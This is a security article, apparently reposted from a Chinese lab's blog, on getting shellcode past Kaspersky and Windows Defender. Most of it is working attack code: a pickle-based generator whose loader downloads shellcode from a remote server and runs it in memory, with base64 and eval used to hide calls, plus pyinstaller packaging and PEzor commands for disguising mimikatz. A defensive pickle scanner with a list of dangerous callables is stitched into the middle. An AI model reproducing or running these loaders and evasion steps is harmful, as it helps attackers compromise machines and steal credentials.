Testing AV evasion against Kaspersky and Windows Defender

Category: Security Articles



When I tested it, it seemed to get past both.


Because the demos floating around online are already widely flagged, I wanted to modify one a bit.





Main idea



It uses deserialization, separates the shellcode from the loader, and base64-encodes the sensitive function calls so they are executed through eval().


import tkinter as tk
import base64
import ctypes
import urllib.request
import codecs
import pickle

def change():
    var = entry.get()
    b64 = str(base64.b64encode(var.encode("utf-8")), "utf-8")
    print(str(b64))
    code = """import codecs,urllib.request,ctypes
code = urllib.request.urlopen('http://vps的ip/code.txt').read()
code = base64.b64decode(code)
code =codecs.escape_decode(code)[0]
code = bytearray(code)

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(code)).from_buffer(code)

string=b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgICAgICBidWYsIAogICAgICAgIGN0eXBlcy5jX2ludChsZW4oY29kZSkpCiAgICAp'
eval(str(base64.b64decode(string),'utf-8'))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""

    class A(object):
        def __reduce__(self):
            return (exec, (code,))

    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    print(ret_base64)

if __name__ == '__main__':
    window = tk.Tk()
    window.title("免杀shellcode -雷石安全")
    window.geometry('300x60+200+300')
    entry = tk.Entry(window, width=40)
    entry.pack()
    button = tk.Button(window, text='生成', command=change).pack()
    window.mainloop()
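The generator above relies on a pickle whose __reduce__ makes the unpickler call exec, which is exactly what a defender can look for statically. As an added example (not part of the original post or its tooling), here is a check that walks a pickle's opcode stream with pickletools and flags such callables without ever loading the pickle; the DANGEROUS list and the sample pickles are constructed for the demo.

```python
import base64
import pickle
import pickletools

# Callables a plain data pickle never needs to resolve (constructed list; extend as needed).
DANGEROUS = {
    ("builtins", "exec"), ("builtins", "eval"), ("__builtin__", "exec"),
    ("__builtin__", "eval"), ("os", "system"), ("subprocess", "Popen"),
}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def referenced_globals(data: bytes):
    """Collect every (module, name) the pickle would import on load by
    walking the opcode stream; nothing in the pickle is ever executed."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                  # protocol <= 3: "module name"
            mod, name = arg.split(" ", 1)
            found.append((mod, name))
        elif op.name in STRING_OPS:              # remember pushed strings
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            # protocol 4+: module and name are the two strings pushed just before.
            # A hand-crafted pickle fetching them via memo GETs needs full stack emulation.
            found.append((strings[-2], strings[-1]))
    return found

def is_suspicious(data: bytes) -> bool:
    return any(g in DANGEROUS for g in referenced_globals(data))

def scan_b64(b64: bytes) -> bool:
    """Same check on the base64 form that a loader would consume."""
    return is_suspicious(base64.b64decode(b64))

# Constructed samples: the __reduce__ trick with a harmless body (only
# inspected here, never loaded) beside an ordinary data pickle.
class _ReduceToExec:
    def __init__(self, src):
        self.src = src
    def __reduce__(self):
        return (exec, (self.src,))

def build_sample(src="print('marker')", protocol=None) -> bytes:
    return pickle.dumps(_ReduceToExec(src), protocol=protocol)

SAMPLE_MALICIOUS = base64.b64encode(build_sample())
SAMPLE_BENIGN = base64.b64encode(pickle.dumps({"user": "alice", "ids": [1, 2, 3]}))
```

Run it against any pickle that a service accepts from untrusted input; a hit on DANGEROUS is a reason to reject the blob before pickle.loads ever sees it.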




Step 1:


Generate the payload


Step 2:




    Paste it into the small input box and click Generate; two values appear:


    The first value is the base64-encoded shellcode that is split out from the loader; put it on the server.




    Start a small web server with Python (you can visit it to check whether it is reachable).


    The second value is our serialized code; all of that green code in the middle runs automatically when we deserialize it.


    Loader py:


import base64,pickle
shellcode =b'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'
#pickle.loads(base64.b64decode(shellcode))
strinq=b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'
eval(str(base64.b64decode(strinq),'utf-8'))


    Paste in the second generated value.


    Run it directly, or


pyinstaller -F loader.py --noconsole -i 13.ico


    to build an exe (with the pyc inside). Of course a script can extract the pyc from it again and read the source (https://tool.lu/pyc/ is a nice site for that).







Addendum




    What is shown above is not enough on its own; for example, how do you get mimikatz past AV?


    I recommend a project I came across in the Red Team Academy (红队学院) community (naturally it can be hardened again after the signature strings have been stripped):

    PEzor


git clone https://github.com/phra/PEzor.git
cd PEzor
sudo bash install.sh
bash PEzor.sh -h




  The install will finish with an error.


Download https://github.com/EgeBalci/sgn, extract it, and put it in the PEzor directory.


Then


export PATH=$PATH:~/go/bin/:/root/dvwa/PEzor:/root/dvwa/PEzor/deps/donut_v0.9.3/:/root/dvwa/PEzor/deps/wclang/_prefix_PEzor_/bin/


Note: /home/dvwa/PEzor must be replaced with your own path.


Also, this command only takes effect in the current shell.




Once that is entered you can happily play around.


For example, a mimikatz that sleeps 120 seconds before calling back:


PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz.exe  -z 2




end





This article was first published on the WeChat public account 雷石安全实验室 (Leishi Security Lab): Testing AV evasion against Kaspersky and Windows Defender
